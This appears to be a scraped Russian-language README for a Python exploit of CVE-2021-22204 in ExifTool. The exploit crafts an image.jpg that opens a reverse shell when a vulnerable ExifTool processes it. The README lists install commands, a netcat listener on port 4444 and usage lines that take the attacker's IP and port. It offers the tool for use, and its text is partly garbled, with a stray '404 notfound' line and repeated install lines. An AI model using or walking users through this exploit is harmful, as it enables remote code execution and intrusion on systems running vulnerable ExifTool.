
Python-эксплойт для CVE-2021-22204 в ExifTool, создающий вредоносное изображение, которое запускает обратную оболочку при обработке уязвимыми версиями.
Python-эксплойт для уязвимости CVE-2021-22204 в Exiftool.
404 notfound
python3 python3-pip djvulibre-bin exiftool
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
pacman -S djvulibre libimage-exiftool-perl python python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
brew install djvulibre exiftool python
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
sudo pip install -r requirements.txt
nc -nvlp 4444
chmod +x exploit.py
python3 exploit.py {Ваш IP-адрес} {Ваш порт для прослушивания}
./exploit.py {Ваш IP-адрес} {Ваш порт для прослушивания}
python3 exploit.py 192.168.0.1 4444
./exploit.py 192.168.0.1 4444
image.jpg
Уязвимость CVE-2021-22204 была обнаружена и сообщена Уильямом Боулингом. (@wcbowling)
Этот эксплойт был создан путём изучения патча exiftool после того, как CVE уже была сообщена.
И image.jpg вызовет уязвимость при открытии с помощью уязвимой версии exiftool.